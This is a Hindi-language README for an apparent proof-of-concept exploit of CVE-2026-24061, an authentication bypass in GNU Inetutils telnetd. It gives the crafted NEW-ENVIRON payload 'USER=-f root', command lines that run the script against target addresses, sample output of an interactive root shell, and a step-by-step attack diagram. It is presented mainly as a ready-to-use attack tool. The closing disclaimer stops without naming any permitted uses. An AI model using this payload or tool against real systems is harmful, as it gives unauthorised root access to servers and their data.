
CVE-2026-24061 के लिए GNU Inetutils telnetd प्रमाणीकरण बाईपास का प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्राफ्टेड NEW-ENVIRON USER वेरिएबल के माध्यम से रूट शेल स्पॉन करता है।
इस रिपॉजिटरी में GNU Inetutils telnetd रिमोट प्रमाणीकरण बायपास भेद्यता के लिए एक Proof‑of‑Concept एक्सप्लॉइट शामिल है।
यह समस्या इसलिए उत्पन्न होती है क्योंकि telnetd /bin/login को कॉल करने से पहले Telnet NEW‑ENVIRON नेगोशिएशन के माध्यम से प्राप्त USER पर्यावरण चर को ठीक से सैनिटाइज़ नहीं करता है।
निम्नलिखित आपूर्ति करके:
USER=-f root
telnetd प्रभावी रूप से निष्पादित करता है:
/bin/login -f root
जो प्रमाणीकरण को बायपास करता है और तुरंत रूट शेल उत्पन्न करता है।
Telnet NEW‑ENVIRON क्लाइंट को सत्र नेगोशिएशन के दौरान पर्यावरण चर सेट करने की अनुमति देता है।
कमजोर telnetd USER को सीधे login को पास करता है:
/bin/login -f "$USER"
एक हमलावर सेट करता है:
USER=-f root
परिणाम:
/bin/login -f root
-f फ्लैग login को प्रमाणीकरण छोड़ने के लिए कहता है, जिससे रूट एक्सेस मिल जाता है।
कोई बाहरी निर्भरता आवश्यक नहीं है।
python3 cve-2026-24061.py 192.168.1.100
python3 cve-2026-24061.py example.com 23
यदि कमजोर है:
# id
uid=0(root) gid=0(root)
#
अब आपके पास एक इंटरैक्टिव रूट शेल है।
python3 cve-2026-24061.py 10.10.10.20
आउटपुट:
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#
sequenceDiagram
participant A as Attacker
participant T as Target telnetd
participant L as /bin/login
participant R as Root Shell
A->>T: Connect TCP/23
A->>T: Telnet NEW-ENVIRON USER=-f root
T->>L: Execute /bin/login -f root
L-->>T: Auth bypass success
T-->>R: Spawn root shell
R-->>A: Interactive root sessionयह एक्सप्लॉइट निम्नलिखित के लिए प्रदान किया गया है:
उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति आपके पास नहीं है, अवैध है।